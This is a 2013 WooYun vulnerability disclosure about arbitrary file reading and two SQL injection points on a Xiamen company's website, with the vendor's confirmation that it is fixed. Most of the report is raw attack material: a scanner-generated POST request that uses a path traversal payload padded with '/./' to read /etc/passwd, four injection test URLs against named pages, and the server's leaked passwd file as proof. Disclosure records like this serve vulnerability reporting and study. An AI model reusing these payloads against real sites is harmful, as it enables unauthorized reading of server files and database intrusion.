当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-033384

漏洞标题:厦门帝网信息科技有限公司官网任意文件读取及两个注入点

相关厂商:厦门帝网信息科技有限公司

漏洞作者: 360安全为士

提交时间:2013-08-03 12:25

修复时间:2013-09-17 12:25

公开时间:2013-09-17 12:25

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-03: 细节已通知厂商并且等待厂商处理中
2013-08-05: 厂商已经确认,细节仅向厂商公开
2013-08-15: 细节向核心白帽子及相关领域专家公开
2013-08-25: 细节向普通白帽子公开
2013-09-04: 细节向实习白帽子公开
2013-09-17: 细节向公众公开

简要描述:

详细说明:

POST /?code&p=add&q=invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././. HTTP/1.1
Content-Length: 515
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_RQPIAHRQSK
Referer: http://www.dyp2p.com:80/
Cookie: PHPSESSID=61bb9f8e5bc87318e1e64296fefafb1f; CNZZDATA4240563=cnzz_eid%3D1387105205-1375496404-http%253A%252F%252Fwww.dyp2p.com%26ntime%3D1375496404%26cnzz_a%3D0%26retime%3D1375496407635%26sin%3Djavascript%253A6JLyWeSokucJWPaS()%253C%253E%26ltime%3D1375496407635%26rtime%3D0
Host: www.dyp2p.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
-------AcunetixBoundary_RQPIAHRQSK
Content-Disposition: form-data; name="content"
1
-------AcunetixBoundary_RQPIAHRQSK
Content-Disposition: form-data; name="email"
sample@email.tst
-------AcunetixBoundary_RQPIAHRQSK
Content-Disposition: form-data; name="name"
afsvgtlh
-------AcunetixBoundary_RQPIAHRQSK
Content-Disposition: form-data; name="submit"
¸øÎÒÁôÑÔ
-------AcunetixBoundary_RQPIAHRQSK
Content-Disposition: form-data; name="tel"
555-666-0606
-------AcunetixBoundary_RQPIAHRQSK--


http://www.dyp2p.com/search/index.html?web_url=1'%22
http://www.dyp2p.com/case/index.html?case_type=1'%22
http://www.dyp2p.com/case/index1.html?case_type=1'%22
http://www.dyp2p.com/case/index2.html?case_type=1'%22


1.PNG

漏洞证明:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
ntp:x:104:106::/home/ntp:/bin/false
mysql:x:105:108:MySQL Server,,,:/var/lib/mysql:/bin/false
proftpd:x:106:65534::/var/run/proftpd:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
dyphp:x:1000:1000::/var/www/dyphp.net:/bin/false
dyp2pnet:x:1001:1001::/var/www/:/bin/false

修复方案:

版权声明:转载请注明来源 360安全为士@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-08-05 14:31

厂商回复:

谢谢,漏洞个已经修补。感恩您的关注,里面少加了个过滤。

最新状态:

暂无